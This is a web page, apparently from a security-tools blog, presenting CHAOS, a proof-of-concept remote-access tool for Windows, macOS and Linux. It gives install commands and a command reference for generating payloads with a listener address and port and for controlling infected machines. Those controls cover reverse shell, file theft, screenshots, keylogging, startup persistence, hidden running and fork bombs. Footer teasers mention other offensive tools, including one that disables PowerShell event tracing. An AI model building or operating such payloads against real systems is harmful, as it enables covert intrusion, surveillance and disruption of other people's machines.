CHAOS is a PoC that allow generate payloads and control remote operating systems.
Features
| Feature | Windows | Mac | Linux |
|---|---|---|---|
Reverse Shell | X | X | X |
Download File | X | X | X |
Upload File | X | X | X |
Screenshot | X | X | X |
Keylogger | X | ||
Persistence | X | ||
Open URL | X | X | X |
Get OS Info | X | X | X |
Fork Bomb | X | X | X |
Run Hidden | X |
Also Read – Osmedeus : Fully Automated Offensive Security Tool for Reconnaissance & Vulnerability Scanning
How to Install
Install dependencies
$ sudo apt install golang git -y
Get this repository
$ go get github.com/tiagorlampert/CHAOS
Get external golang dependencies (ARE REQUIRED GET ALL DEPENDENCIES)
$ go get github.com/kbinani/screenshot
$ go get github.com/lxn/win
$ go get github.com/matishsiao/goInfo
$ go get golang.org/x/sys/windows
Maybe you will see the message “package github.com/lxn/win: build constraints exclude all Go files”.
It’s occurs because the libraries are to windows systems, but it necessary to build the payload.
Go into the repository
$ cd ~/go/src/github.com/tiagorlampert/CHAOS
Run
$ go run main.go
How to Use?
| Command | On HOST does… |
|---|---|
generate | Generate a payload (e.g. generate lhost=192.168.0.100 lport=8080 fname=chaos --windows) |
lhost= | Specify a ip for connection |
lport= | Specify a port for connection |
fname= | Specify a filename to output |
--windows | Target Windows |
--macos | Target Mac OS |
--linux | Target Linux |
listen | Listen for a new connection (e.g. listen lport=8080) |
serve | Serve files |
exit | Quit this program |
| Command | On TARGET does… |
|---|---|
download | File Download |
upload | File Upload |
screenshot | Take a Screenshot |
keylogger_start | Start Keylogger session |
keylogger_show | Show Keylogger session logs |
persistence_enable | Install at Startup |
persistence_disable | Remove from Startup |
getos | Get OS name |
lockscreen | Lock the OS screen |
openurl | Open the URL informed |
bomb | Run Fork Bomb |
clear | Clear the Screen |
back | Close connection but keep running on target |
exit | Close connection and exit on target |
Demo Video
Disclaimer
THIS SOFTWARE IS PROVIDED “AS IS” WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…